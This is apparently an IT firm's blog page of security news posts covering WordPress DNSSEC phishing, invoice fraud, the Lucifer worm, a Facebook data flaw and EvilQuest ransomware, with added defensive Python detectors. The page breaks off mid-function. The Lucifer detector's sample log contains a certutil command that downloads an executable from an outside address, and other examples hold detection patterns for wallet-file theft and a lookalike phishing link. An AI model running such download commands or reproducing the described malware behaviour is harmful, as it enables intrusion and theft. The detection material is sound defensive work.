
True North Networks Blog

True North Networks has been a national provider since 2002, providing IT support such as technical helpdesk support, computer support, and consulting to small and medium-sized businesses.

A "Secure DNS" Scam: an Upgrade that's a Downgrade


A phishing campaign is targeting website owners with convincing, personalized emails that purport to come from WordPress, Naked Security reports. The emails claim that WordPress is upgrading the recipient’s domain to use DNSSEC (Domain Name System Security Extensions). The message contains few spelling or grammatical errors, and it includes genuine explanations (copied from ICANN’s website) of what DNS and DNSSEC are. Naked Security notes that many website operators will have heard of DNSSEC, and they probably know that it is a good security measure.

“On the other hand, you’ve probably never set up DNSSEC or used it directly yourself, because it has typically been a feature used by service providers to help to keep their own DNS databases intact when they exchange data with other DNS servers,” Naked Security says. “In other words, activating DNSSEC for the server names that your hosting provider looks after for you certainly sounds like a good idea. So we can understand why some recipients of this scam might click through in order to learn more.”

The emails contain a link that’s tailored to each recipient. In Naked Security’s case, the link said, “Click here and activate DNSSEC to” If the recipient clicks the link, they are taken to a phishing page that convincingly spoofs a WordPress login page. The page specifically says “Admin Area” to induce the user to enter their administrative credentials, which are sent to the attackers. The premise itself is the tell: DNSSEC is enabled at the DNS hosting provider or domain registrar, not through a website’s CMS login, so no genuine DNSSEC rollout would ask for WordPress administrator credentials.

While this scam was tailored to WordPress users (since Naked Security is hosted on WordPress), Naked Security found an image directory on the phishing site that contained the banner logos of 97 other hosting providers, including Akamai, HostGator, Linode, Magento, and Microsoft. The link in the email is customized so that users of different hosting providers will see the login page specific to their provider.
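Because the lure works by naming a provider the recipient trusts while the link points somewhere else, the one check that defeats it is comparing the link’s real host against the provider the email claims. The following is an added example for this post, not code from Naked Security or from the campaign; the sample email body, the provider-to-domain table and the lookalike hostnames are constructed for illustration, and the “last two labels” rule for the registrable domain is a simplification (use a public-suffix list for country-code domains).

```python
"""Check whether a login link in an email points at the provider it
claims to. Added example, not code from Naked Security or the campaign;
the sample email text, the provider-to-domain table and the lookalike
hostnames are constructed for illustration."""
import re
from urllib.parse import urlparse

# Claimed provider (lower-case, as named in the email) -> registrable
# domains a genuine login page would live on. Values are assumptions.
EXPECTED_DOMAINS = {
    "wordpress": {"wordpress.com", "wordpress.org"},
    "linode": {"linode.com"},
}

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)


def registrable_domain(hostname: str) -> str:
    """Last two labels of the host. Fine for .com/.org; for suffixes such
    as co.uk use a public-suffix list instead (simplifying assumption)."""
    labels = hostname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def check_link(url: str, claimed_provider: str) -> dict:
    """Return a verdict for one URL against the provider the email names."""
    parsed = urlparse(url)
    host = parsed.hostname or ""          # drops userinfo, port and case
    expected = EXPECTED_DOMAINS.get(claimed_provider.lower(), set())
    reg = registrable_domain(host)
    problems = []
    if parsed.scheme.lower() != "https":
        problems.append("not https")
    if reg not in expected:
        problems.append(f"host {host!r} is not under {sorted(expected)}")
    # "https://wordpress.com@evil.example/" shows the trusted name but
    # connects to evil.example; urlparse already gave us the real host,
    # this just names the trick in the verdict.
    if "@" in url.split("://", 1)[-1].split("/", 1)[0]:
        problems.append("userinfo before '@' hides the real host")
    if "xn--" in host:
        problems.append("punycode label; check for a lookalike")
    return {"url": url, "host": host, "registrable": reg,
            "ok": not problems, "problems": problems}


def check_email(body: str, claimed_provider: str) -> list:
    """Run check_link over every URL found in an email body."""
    return [check_link(u, claimed_provider) for u in URL_RE.findall(body)]


# Constructed email body in the style of the campaign described above.
SAMPLE_EMAIL = """\
WordPress is upgrading your domain to DNSSEC.
Click here and activate DNSSEC: https://wordpress.com.dns-upgrade.example/admin
Help: https://wordpress.com/support
"""

if __name__ == "__main__":
    for verdict in check_email(SAMPLE_EMAIL, "WordPress"):
        print("OK " if verdict["ok"] else "BAD", verdict["url"], verdict["problems"])
```

The “activate DNSSEC” link in the constructed email fails because its registrable domain is dns-upgrade.example, not wordpress.com, while the support link passes; the same comparison catches the userinfo trick and a plain-http login page.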

New-school security awareness training can enable your employees to be suspicious anytime they’re asked to enter their credentials.



Business Email Compromise Attacks Focused on Invoice Fraud Surge by 75%


As attacks on the C-suite decline, new data shows that employees in finance-department roles have become the primary targets as attackers shift their campaign strategy.

There’s one thing we’ve learned to be true about cybercriminals that use phishing emails as their initial attack vector – it’s that they always align their target victim with the campaign. From selecting the victim, to the choice of crime to be committed, to the social engineering tactics, every last detail is planned out to maximize the success of the attack efforts.

According to email security provider Abnormal Security, in its Quarterly BEC Report for Q1 2020, the cybercriminal organizations engaged in business email compromise attacks have changed their tactics, in some cases drastically:

  • From individual to group targets – campaigns with more than 10 recipients were up 27%
  • From C-suite to finance staff – campaigns targeting execs declined by 37% while those targeting finance staffers increased 87%
  • From engagement attacks to invoice fraud – paycheck and engagement attacks declined by more than half while invoice fraud increased by 75%
  • COVID-19 remains popular – Throughout the course of Q1, coronavirus-themed attacks rose by an average of 173%

With the overarching takeaway being that all your finance employees are targets of invoice fraud, there is something tangible to communicate to that segment of your staff to avoid becoming a victim. But because tactics will continue to change as organizations become wise to attacks and other parts of the business relax their guard, it is important to keep the entire organization vigilant by enrolling them in continual Security Awareness Training, which educates them on the need to be watchful for suspicious content and offers up pertinent examples as attack trends change.



How to protect yourself from COVID-19 scams and improve cyber hygiene


Earlier this month, the Canadian Centre for Cyber Security released an update to their list of ways that people in Canada can protect themselves from COVID-19 scams. In a statement made earlier today, Canada Labour Minister Filomena Tassi said that “Canadians are still being targeted by scams involving text messages and emails, which can lead to identity theft and financial loss; The Canadian Centre for Cyber Security has advice to help you improve your cyber hygiene.”

According to the Canadian Centre for Cyber Security, the five ways that people in Canada can protect themselves from COVID-19 scams are as follows:

1. Be on guard for scams

Don’t click on suspicious links. Also note that the government will never send you a text message about a payment or send you an e-transfer. (Visit the CRA website for ways to spot different scams.)

2. Secure your social media and email accounts

Review your privacy settings on social media and make sure your security questions to all your account logins are something only you would know the answer to.

3. Apply updates to your mobile devices, computers and applications

These updates are important and often contain “security patches.” Enable automatic updates if given the option to do so.

4. Store your data securely and know your back-up procedures

In addition to using an anti-virus or anti-malware program, it’s important to back up important information and files. You can use a cloud service to do that, but be sure to practise data recovery at least once so you know what to expect if you have to do it again.

5. Practice good password etiquette

Use passwords that are complex, and never share them. Don’t use the same passwords between different accounts, and use two-factor authentication when possible.

The complete statement on cyber hygiene during COVID-19 is available from the Canadian Centre for Cyber Security.



Half of all Remote Employees Aren’t the Slightest Bit Prepared for Cyberattacks


New data from IBM suggests that employees, their devices, training, and organizational policies are all lacking when it comes to making sure remote workers don’t become victims of cybercrime.

We’re well past the shock of needing to set up remote operations with employees working from home. And enough time has passed that the world has seen how cybercriminals have changed their targets and tactics to take advantage of the unsuspecting remote worker.

So, surely, one would expect to see organizations taking steps to ensure the security of the employee, and the organization itself, right?

Well, according to IBM Security’s newly-released Work from Home Study, cyber readiness in the remote workplace is still a mess:

  • 53% of remote employees “have yet to be given any new security policies on how to securely work from home”
  • Of the over half of remote employees using their personal device for work, 61% say their employer hasn’t taken steps to help secure it
  • 66% haven’t been given any password management guidelines
  • 45% haven’t been given any new security training

The shift to working from home is not just about making employees operational; it’s also about extending at least the same security policies and governance to the remote worker, while shoring up security upon realizing the increased risk of them working from home.

With so many security issues to address – from insecure WiFi, to personal devices, to home distractions, to a lack of guidance, where should organizations pick up the pieces today?

Given so many variables of how a given employee may be connecting to organizational resources, the answer lies in the one constant – the employee themselves. By enrolling employees in Security Awareness Training, the organization props up the best possible defense against the ever-changing state of cyberattack. Employees can be taught to be mindful of corporate data, the use of phishing and social engineering, and how to spot suspicious email and web content.

Remote workers still have a lot of adjustment on their plate and it seems like every week, there’s something new to deal with. By providing a source of stability through training, organizations can immediately see an improvement in their remote security stance, providing time to address the other factors.



National Security Agency warns that VPNs could be vulnerable to cyberattacks


The National Security Agency issued a new cybersecurity advisory on Thursday, warning that virtual private networks, or VPNs, could be vulnerable to attacks if not properly secured. The agency's warning comes amid a surge in telework as organizations adapt to coronavirus-related office closures and other constraints.

A VPN allows users to establish private, encrypted connections to another network over the internet. They are used widely by corporations and other organizations to protect proprietary data from hackers while employees work remotely. 

A senior NSA official who briefed reporters Wednesday said the increase in remote work had attracted the attention of potentially malicious cyber actors.  


[Heads Up] A New Devilish Malware Worm Called Lucifer Is Targeting Your Windows Workstations


Palo Alto Networks’ Unit 42 researchers have identified a malware worm called Lucifer that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.

This new strain initially tries to infect PCs by bombarding them with a long list of known exploits, hoping to cash in on unpatched vulnerabilities. While patches for all of these critical and high-severity bugs exist, the organizations infected by this new malware strain had not applied them.

“Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,” Palo Alto said on Wednesday in a blog post. “Applying the updates and patches to the affected software are strongly advised.”

The exploits Lucifer is using include Rejetto HTTP File Server (CVE-2014-6287), Oracle WebLogic (CVE-2017-10271), ThinkPHP RCE (CVE-2018-20062), Apache Struts (CVE-2017-9791), Laravel framework (CVE-2019-9081), and Microsoft Windows (CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464).

After a successful exploit, the strain connects to its command-and-control (C2) server and can execute arbitrary commands on the compromised host. Its "features" include dropping an XMRig miner to launch cryptojacking attacks, collecting network interface information, and reporting the miner’s status back to the C2.

The malware is also capable of self-propagation with worm-like features.

The Threatpost site commented: "It scans for either open TCP ports (also known as port 1433) or open Remote Procedure Call (RPC) ports (also known as port 135). If either of these ports is open, the malware attempts to brute-force the login using a default administrator username and an embedded password list (a full list of the passwords used can be found on Unit 42’s analysis). It then copies and runs the malware binary on the remote host upon successful authentication.

In addition to brute-forcing credentials, the malware leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file sharing protocol) is open, Lucifer executes several backdoors. These include the EternalBlue, EternalRomance, and DoublePulsar exploits.

Once these three exploits have been used, the certutil utility is then used to propagate the malware. Certutil.exe is a command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates.

Lucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.

These added capabilities show that the malware is growing in sophistication, researchers warn. They say enterprises can protect themselves with simple security measures such as applying patches and strengthening passwords.

“While the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it’s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance,” stressed researchers."
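The propagation behaviour described in the Threatpost excerpt above gives a defender two cheap signals: a burst of failed logins against the SQL Server port from a single source, and certutil.exe being handed a URL to fetch. The following is an added example that runs both rules over constructed log records; it is not code from Unit 42 or Threatpost. The record format and field names, the threshold and window, the "sa" account name, and the certutil download form ("-urlcache -split -f <URL>", which the post does not quote) are all assumptions.

```python
"""Two detection rules for the Lucifer propagation behaviour described
above, run over constructed log records. Added example, not code from
Unit 42 or Threatpost; record format, field names, thresholds, the "sa"
account and the certutil download command line are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

T0 = datetime(2020, 6, 10, 10, 0, 0)   # constructed base time


def _login_failed(offset_s, src, user="sa", dst_port=1433):
    return {"ts": T0 + timedelta(seconds=offset_s), "type": "login_failed",
            "src": src, "dst_port": dst_port, "user": user}


def _process(offset_s, host, image, cmdline):
    return {"ts": T0 + timedelta(seconds=offset_s), "type": "process_create",
            "host": host, "image": image, "cmdline": cmdline}


# Constructed sample log: one source hammers port 1433, one fails once,
# one host pulls a binary with certutil, one uses certutil legitimately.
SAMPLE_LOGS = (
    [_login_failed(i * 5, "10.0.0.7") for i in range(8)]
    + [_login_failed(30, "10.0.0.9")]
    + [_process(120, "ws01", r"C:\Windows\System32\certutil.exe",
                r"certutil.exe -urlcache -split -f http://203.0.113.5/x.exe C:\Users\Public\x.exe"),
       _process(180, "ws02", r"C:\Windows\System32\certutil.exe",
                r"certutil.exe -dump C:\temp\cert.cer")]
)


def detect_login_bruteforce(records, port=1433, threshold=5,
                            window=timedelta(seconds=60)):
    """Sources with at least `threshold` failed logins to `port` inside
    any sliding window of length `window`. Pass port=135 for the RPC
    case mentioned above."""
    by_src = defaultdict(list)
    for r in records:
        if r["type"] == "login_failed" and r["dst_port"] == port:
            by_src[r["src"]].append(r["ts"])
    flagged = set()
    for src, times in by_src.items():
        times.sort()
        j = 0                                   # two-pointer window scan
        for i, start in enumerate(times):
            while j < len(times) and times[j] - start <= window:
                j += 1
            if j - i >= threshold:
                flagged.add(src)
                break
    return flagged


# certutil invoked with an http(s) URL anywhere on its command line.
CERTUTIL_URL = re.compile(r"certutil(\.exe)?\b.*\bhttps?://", re.IGNORECASE)


def detect_certutil_download(records):
    """Process creations where certutil is used as a downloader."""
    return [r for r in records
            if r["type"] == "process_create"
            and r["image"].lower().endswith("certutil.exe")
            and CERTUTIL_URL.search(r["cmdline"])]


if __name__ == "__main__":
    print("brute-force sources:", detect_login_bruteforce(SAMPLE_LOGS))
    for hit in detect_certutil_download(SAMPLE_LOGS):
        print("certutil download on", hit["host"], ":", hit["cmdline"])
```

The legitimate certutil call on ws02 (dumping a certificate file) is not flagged because no URL appears on its command line, which keeps the rule from paging on the utility's normal use.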



Facebook Privacy Glitch Gave 5K Developers Access to ‘Expired’ Data


Facebook has fixed a privacy issue that gave developers access to user data long after the 90-day “expiration” date.

Facebook is facing yet another privacy faux pas in how its users’ data is collected and used by third-party apps. The social media giant said that it recently discovered that 5,000 developers received data from Facebook users — long after their access to that data should have expired.

In 2018, on the heels of the Cambridge Analytica privacy incident, Facebook debuted stricter controls over data collection by third-party app developers. As part of that, Facebook announced it would automatically expire an app’s ability to receive a user’s data if they hadn’t used the app in 90 days.

However, recently, “we discovered that in some instances apps continued to receive the data that people had previously authorized, even if it appeared they hadn’t used the app in the last 90 days,” said Konstantinos Papamiltiadis, vice president of Platform Partnerships with Facebook, in a Wednesday post.

For example, “this could happen if someone used a fitness app to invite their friends from their hometown to a workout, but we didn’t recognize that some of their friends had been inactive for many months,” he said.

Facebook estimates that 5,000 developers were able to continually receive information (such as language or gender) on “inactive” app users, in this manner. It has since fixed the issue.
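The failure described above is a general one in consent expiry: the clock must run on the data subject’s own activity, not on other users’ actions that merely reference them. The following is an added illustration, not Facebook’s code; it models a grant with both signals, shows the check that treats any reference as activity beside the corrected one, and replays the fitness-app invitation case. The grant fields, the event shape and the two check functions are assumptions; only the 90-day rule comes from the post.

```python
"""Model of a 90-day inactivity expiry for third-party data access, with
the loophole described above beside the corrected check. Added
illustration, not Facebook's code; the grant fields, event shape and
check functions are assumptions, only the 90-day rule is from the post."""
from dataclasses import dataclass
from datetime import datetime, timedelta

INACTIVITY_LIMIT = timedelta(days=90)


@dataclass
class Grant:
    app_id: str
    user_id: str
    last_self_use: datetime    # last time this user themselves used the app
    last_any_touch: datetime   # last time any app event referenced this user


def record_event(grants, app_id, actor_id, referenced_ids, when):
    """The actor used the app and referenced other users (e.g. invited them)."""
    for g in grants:
        if g.app_id != app_id:
            continue
        if g.user_id == actor_id:
            g.last_self_use = when
            g.last_any_touch = when
        elif g.user_id in referenced_ids:
            g.last_any_touch = when   # the loophole: someone else's action


def may_release_buggy(grant, now):
    """Treats any reference to the user as that user's activity."""
    return now - grant.last_any_touch <= INACTIVITY_LIMIT


def may_release_fixed(grant, now):
    """Only the data subject's own use keeps the grant alive."""
    return now - grant.last_self_use <= INACTIVITY_LIMIT


def scenario():
    """Alice uses a fitness app today and invites Bob, who last used it
    200 days ago. Returns whether each check would release Bob's data."""
    today = datetime(2020, 7, 1)
    long_ago = today - timedelta(days=200)
    grants = [
        Grant("fitness", "alice", today - timedelta(days=1), today - timedelta(days=1)),
        Grant("fitness", "bob", long_ago, long_ago),
    ]
    record_event(grants, "fitness", "alice", {"bob"}, today)
    bob = next(g for g in grants if g.user_id == "bob")
    return {"buggy": may_release_buggy(bob, today),
            "fixed": may_release_fixed(bob, today)}


if __name__ == "__main__":
    print(scenario())   # the buggy check releases Bob's data; the fixed one does not
```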

The company said it hasn’t seen evidence that this issue resulted in sharing information that was inconsistent with the permissions people gave when they logged in using Facebook, however.

Facebook’s privacy troubles began in 2018 after its Cambridge Analytica privacy snafu. After that, the company said it suspended tens of thousands of apps as part of its ongoing investigation into how third-party apps on its platform collect, handle and utilize users’ personal data. And then in 2019, Facebook found that 100 third-party app developers improperly accessed the names and profile pictures of members in various Facebook groups.

“Facebook is a data-aggregation company first and foremost. Given this, it’s of no surprise that slip ups occasionally occur around the handling of the vast amount of raw and post-processed data they house,” Jonn Callahan, principal AppSec consultant at nVisium, told Threatpost. “This is especially true given their track record. It’s clear that proper handling of the collected data comes second to the monetization of the data.”

To bolster its privacy policies, earlier in June, Facebook said it had started to report its privacy practices to a newly formed, independent Privacy Committee. The creation of the independent committee was part of the company’s settlement a year ago with the Federal Trade Commission (FTC) over data-privacy violations, which came in addition to a $5 billion fine (which was derided as “chump change” by lawmakers and privacy analysts).

Facebook said on Wednesday it would attempt to further tighten its policies around third-party data collection by providing developers with clearer guidance around data usage and sharing.

“Today we’re also introducing new Platform Terms and Developer Policies to ensure businesses and developers clearly understand their responsibility to safeguard data and respect people’s privacy when using our platform,” Papamiltiadis said. “These new terms limit the information developers can share with third parties without explicit consent from people. They also strengthen data security requirements and clarify when developers must delete data.”

Brendan O’Connor, CEO and co-founder of AppOmni, said Facebook does deserve some kudos for its recent steps in attempting to control data collection by developers. “Raising awareness of unused applications and helping users make better data privacy decisions is a big step in the right direction, and Facebook deserves some credit for their approach,”  he told Threatpost.

Threatpost has reached out to Facebook for further comment on the privacy flaw, as well as its new privacy policies for developers.



How You Can Increase Employee Engagement with Security Awareness Training


One of the most common questions I get asked working for a security awareness training company is, how do I make employees more engaged with and care about the training? I get it. Who wants to take even more time doing “busy work” when you’ve got a real job to do?

As my co-worker Perry Carpenter says in his book, Transformational Security Awareness, “They may be aware and still not care.” Here’s how you make them care.

There are two keys: First, imparting the importance and second, incentives.

The Importance of Security Awareness Training

Part of the problem is that most users have no idea how big of a role security awareness training can play in their fight against social engineering and phishing as compared to other defenses. Users are told they have to do a “hundred different things” to fight computer crime, such as “Make sure your software is patched”, “Make sure to lock your desktop when you are away”, “Don’t click on unexpected file attachments”, and “Make sure your password is long and complex”. Users hear so many rules and recommendations that they can’t figure out which one is or isn’t as important as another. There is very little teaching of relevance in the computer security world. It’s as if we treated playing with Nerf darts the same as playing with real guns. Both can cause injury, but one is more likely to result in serious, long-lasting injury than another.

But if you share the facts, that nothing could be as important to the cybersecurity of an organization as fighting social engineering (and show them using data and pictures), it helps to provide relevance and focus. According to nearly every study done on computer security crime for over a decade, social engineering and phishing are responsible for more cybersecurity incidents than any other cause. Social engineering and phishing are responsible for 70% to 90% of security breaches. Unpatched software is responsible for 20% to 40% of malicious data breaches. Nothing else comes close. All other types of computer crime (e.g., password attacks, eavesdropping, misconfiguration, insider attacks, etc.) amount to just 1% to 10% of malicious data breaches. The figure below shows risk percentages of the top two risks as compared to all the others.

This means there is nothing else that matters as much to reduce cybersecurity risk as focusing on defeating social engineering and phishing. This also means that if an organization doesn’t effectively mitigate social engineering and phishing, nothing else matters.

I don’t want you to just trust me and what I say, although my co-worker, Javvad Malik’s white paper revealed that the top cause of cyber crime was social engineering and phishing in the 100 other threat intelligence reports he reviewed. Just ask yourself and ask your employees to ask, when they have been hacked by a malicious hacker or were infected by malware, how did it happen? Ninety-nine percent of the time, I bet you and they will say it was either social engineering or unpatched software. When employees learn that social engineering is the biggest cyber risk their organization faces, they usually understand why it’s important that they help in fighting it.


Incentivizing people to want to take training doesn’t hurt, especially if they first understand and care why they have to take it. Some people like to threaten employees, “Take this training or you are fired!” At KnowBe4, we believe in more carrot and less stick. That doesn’t mean you can’t have penalties for not taking training, but don’t just make it about negative reinforcement. Even if it is something they have to take, I’d rather see whether they took the training as part of a wider review process, such as an annual review. I’m completely open to people taking training as part of determining whether they get a good or a bad review; just don’t make it the sole deciding factor. I’d hate to see an otherwise perfect employee who has never been tricked by social engineering or phishing in real life get a bad review simply because they didn’t take training. But I’m OK with making the training mandatory and noting a negative indicator on their annual review if they don’t take it.

Note: I’ve also heard of bosses who fired people who failed one simulated phishing test. That’s definitely a bit harsh and I don’t recommend it. Policies like those incentivize people who fall for phishing and realize it, to cover it up instead of proactively reporting to IT so the risk can be addressed early and appropriately.

Other Ideas to Engage Employees

Here are some other ideas on how to get employees more engaged in security awareness training:

Offer Rewards

Offer nothing but a carrot. I know of organizations that offer cash bonuses, up to $1,000, for employees who not only take/pass security awareness training, but who also don’t fail any simulated phishing tests. This is essentially making it part of their annual review process, but not calling it out as solely a negative. This is a chance for someone to make more money, not to lose something promised. Some organizations offer quarterly gift cards to employees who take training and don’t fail simulated phishing tests. I’ve seen organizations pay for pizza parties, gifts, and even mini, nearby vacations.

If the latter idea sounds extravagant, I thought the same when a CEO told me he paid $1,000 to every employee at the end of the year for passing all simulated phishing tests. I told him I could not believe he gave so much money to each employee and how generous it was. He told me that if I believed social engineering and phishing were the top threat to most organizations (and I do), then it was some of the best money he’s spending each year. He said almost no employee clicks on any URL link without investigating it first. No one wants to lose their $1,000. He said that in the five years he’s been offering the money, they’ve been malware- and ransomware-free, and that isn’t true of any of his closest competitors. He said the $1,000 per employee that he spends works better than any antivirus defense he’s paid for in his career.

He said if an organization doesn’t have an extra thousand to give each employee, just give every new employee hired $1,000 less in salary when they come on and offer what you would have given them anyway as part of the competition. He said you end up paying them what you would have paid them anyway, they think you are great for giving them a chance for an extra $1,000 bonus around Christmas time, and it will create a comprehensive culture of security awareness at your organization. I can’t argue with that.

Offer Interesting Training

Most employees have had enough boring, staid training. So, give them more exciting education. For example, at KnowBe4, our award-winning, Netflix-like, The Inside Man series is loved by almost every person who takes it. It’s not going to win an Oscar, but for computer security training, it’s pretty great. The Inside Man uses professional actors with professional production values and a mystery-driven narrative to show and teach computer security defenses. No one can believe that it is training. We have security administrators and employees asking when the next episodes will be out. When does that ever happen with training? Well, it does with The Inside Man.

Switch It Up

Make sure you switch up training content. Try different things. Different people learn differently. At KnowBe4, our extensive content spans across just about every type of learning style you can imagine – videos, documents, posters, quizzes, and even cartoons. Even if someone loves a particular style of learning, say The Inside Man, it can’t hurt to switch it up every now and then. Maybe switch to a cartoon or send around a security training poster, like KnowBe4’s Social Engineering Red Flags PDF as shown below and available for download here.

Don’t Underestimate the Power of a Certificate

It’s amazing what a printed certificate of achievement can do to brighten someone’s outlook. Many organizations recognize employees who go a quarter or year without failing a simulated phishing test with a certificate suitable for hanging. It’s a small, nearly cost-free, action that will result in a tremendous amount of goodwill and feeling of accomplishment in many employees. It’s not the paper they love, it’s the recognition of their accomplishments by an organization that shows it cares.

Offer Free Training for Families

Nothing makes people care more than if you care about them and their families. All KnowBe4 customers get content that is meant to be shared with their families. Parents who share tips with their children on how not to be socially engineered or phished are more likely to apply those lessons at work.

Simulated Phishing

Lastly, send simulated phishing emails to your employees and co-workers. Simulated phishing emails used to be seen as somewhat taboo. Today, nearly every organization does it, and it is rare to find one that doesn’t. Simulated phishing is part of the education process. It reinforces the lessons learned and helps employees and IT gauge the effectiveness of the security awareness program. Don’t let criminal phishers be the only ones who ever phish your employees. Plus, it gamifies the training, especially if it isn’t associated with purely negative consequences. If you make it a game, you will get a certain percentage of your employees genuinely engaged who otherwise would not have been.



Social Media Cybersecurity Safety Tips


Have your family, friends and community follow these tips to safely enjoy social media.

Privacy and security settings exist for a reason: Learn about and use the privacy and security settings on social networks. They are there to help you control who sees what you post and manage your online experience in a positive way.

Once posted, always posted: Protect your reputation on social networks. What you post online stays online. Think twice before posting pictures you wouldn’t want your parents or future employers to see. Recent research found that 70 percent of job recruiters rejected candidates based on information they found online.

Your online reputation can be a good thing: Recent research also found that recruiters respond to a strong, positive personal brand online. So show your smarts, thoughtfulness and mastery of the environment.

Keep personal info personal: Be cautious about how much personal information you provide on social networking sites. The more information you post, the easier it may be for a hacker or someone else to use that information to steal your identity, access your data or commit other crimes such as stalking.

Know and manage your friends: Social networks can be used for a variety of purposes. Some of the fun is creating a large pool of friends from many aspects of your life. That doesn’t mean all friends are created equal. Use tools to manage the information you share with friends in different groups or even have multiple online pages. If you’re trying to create a public persona as a blogger or expert, create an open profile or a “fan” page that encourages broad participation and limits personal information. Use your personal profile to keep your real friends (the ones you know and trust) up to date with your daily life.

Be honest if you’re uncomfortable: If a friend posts something about you that makes you uncomfortable or seems inappropriate, let them know. Likewise, stay open-minded if a friend approaches you because something you’ve posted makes him or her uncomfortable. People have different tolerances for how much the world knows about them; respect those differences.

Know what action to take: If someone is harassing or threatening you, remove them from your friends list, block them and report them to the site administrator.

Keep security software current: Having the latest security software, web browser and operating system is the best defense against viruses, malware and other online threats.

Own your online presence: When applicable, set the privacy and security settings on websites to your comfort level for information sharing. It’s OK to limit how and with whom you share information.

Make your passphrase a sentence: A strong passphrase is a sentence that is at least 12 characters long. Focus on positive sentences or phrases that you like to think about and are easy to remember (for example, “I love country music.”). On many sites, you can even use spaces!

Unique account, unique passphrase: Having separate passphrases for every account helps to thwart cybercriminals. At a minimum, separate your work and personal accounts and make sure that your critical accounts have the strongest passphrases.

When in doubt, throw it out: Links in email, tweets, posts and online advertising are often how cybercriminals try to steal your personal information. Even if you know the source, if something looks suspicious, delete it.

Post only about others as you have them post about you: The Golden Rule applies online as well.



EvilQuest Mac Ransomware Has Keylogger, Crypto Wallet-Stealing Abilities


A rare, new Mac ransomware has been discovered spreading via pirated software packages.

A rare new ransomware strain targeting macOS users has been discovered, called EvilQuest. Researchers say the ransomware is being distributed via various versions of pirated software.

EvilQuest, first discovered by security researcher Dinesh Devadoss, goes beyond the normal encryption capabilities for run-of-the-mill ransomware, including the ability to deploy a keylogger (for monitoring what’s typed into devices) and the capability to steal cryptocurrency wallets on the victims’ systems.

EvilQuest samples have been found in various versions of pirated software, which are being shared on BitTorrent file-sharing sites. While this method of infection is relatively unsophisticated, it is common for other macOS malware variants – including OSX.Shlayer – “thus indicating it is (at least at some level) successful,” according to Patrick Wardle, security researcher with Jamf, in a Monday analysis.

While Devadoss found the ransomware purporting to be a Google Software Update package, Wardle inspected a ransomware sample that was being distributed via a pirated version of “Mixed In Key 8,” which is software that helps DJs mix their songs.

Another sample was analyzed Tuesday by Thomas Reed, director of Mac and mobile with Malwarebytes, in a malicious, pirated version of Little Snitch. Little Snitch is a legitimate, host-based application firewall for macOS. The malicious installer was found available for download on a Russian forum, dedicated to sharing torrent links.

“The legitimate Little Snitch installer is attractively and professionally packaged, with a well-made custom installer that is properly code signed,” Reed said. “However, this installer was a simple Apple installer package with a generic icon. Worse, the installer package was pointlessly distributed inside a disk image file.”

Once a victim runs one of these malicious installers, it drops an executable named “patch” into the “/Users/Shared/” directory. After the installation process completes, a post-install script loads and launches that executable. The ransomware then begins encrypting the victim’s files by invoking its “eip_encrypt” function, and once encryption is complete it writes a text file (READ_ME_NOW) containing the ransom instructions (the samples analyzed demanded $50).

Interestingly, to ensure the victims see the ransom note, the ransomware displays a text-to-speech prompt, which reads the ransom note aloud to the victim via the macOS built-in “voice” capabilities.

Reed found that “the malware… appeared to encrypt a number of settings files and other data files, such as the keychain files. This resulted in an error message when logging in, post-encryption.”

The ransomware also includes in-memory code execution, anti-analysis and persistence capabilities, researchers found. As part of its anti-analysis measures, EvilQuest includes the functions “is_debugging” and “is_virtual_mchn,” which attempt to detect an attached debugger and to determine whether the sample is running inside a virtual machine (both signs that a malware researcher may be analyzing it).

The malware was meanwhile spotted making calls to CGEventTapCreate, a system API that lets a process monitor events such as keystrokes and is commonly used by malware for keylogging. Researchers found tasks from the ransomware’s command-and-control (C2) server prompting it to start a keylogger.

The ransomware also hunts for cryptocurrency wallet files, searching specifically for the following names: “wallet.pdf”, “wallet.png”, “key.png” and “*.p12”.

Wardle said that the malware can also open a reverse shell to the C2 server. “Armed with these capabilities, the attacker can maintain full control over an infected host,” he warned.
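The behaviours described above translate directly into hunting logic. The following is an added example, not code from the original post or from the researchers it cites: it turns the indicators named in the text (an executable called “patch” in /Users/Shared/, a READ_ME_NOW ransom note, keychain files being overwritten, and reads of wallet.pdf, wallet.png, key.png and *.p12) into checks over a file-event log. The tab-separated log format, the sample rows and the “mass write burst” threshold are assumptions made for illustration.

```python
"""Hunt for the EvilQuest behaviours described above in a file-event log.

Added example, not code from the original post or from the researchers it
cites. The log format (tab-separated "process<TAB>path<TAB>action") and the
sample rows are constructed for illustration; the indicators come from the
text: an executable named "patch" dropped into /Users/Shared/, a READ_ME_NOW
ransom note, keychain files being overwritten, and reads of wallet.pdf,
wallet.png, key.png and *.p12 files.
"""
import fnmatch
import posixpath
from collections import defaultdict

DROPPER_PATH = "/Users/Shared/patch"
RANSOM_NOTE_NAMES = {"READ_ME_NOW", "READ_ME_NOW.txt"}
WALLET_PATTERNS = ("wallet.pdf", "wallet.png", "key.png", "*.p12")
KEYCHAIN_DIR = "/Library/Keychains/"   # present in user and system keychain paths

# Constructed sample, not a real capture. Only "patch" behaves suspiciously.
SAMPLE_LOG = "\n".join(
    ["installer\t/Users/Shared/patch\tcreate",
     "patch\t/Users/Shared/patch\texec",
     "patch\t/Users/dj/Documents/wallet.pdf\tread",
     "patch\t/Users/dj/Documents/certs/client.p12\tread",
     "patch\t/Users/dj/Library/Keychains/login.keychain-db\twrite"]
    + [f"patch\t/Users/dj/Music/set{i}.mp3\twrite" for i in range(5)]
    + ["patch\t/Users/dj/READ_ME_NOW.txt\tcreate",
       "Safari\t/Users/dj/Downloads/page.html\twrite"]
)


def parse_events(log_text):
    """Parse 'process<TAB>path<TAB>action' lines; skip blanks and # comments."""
    events = []
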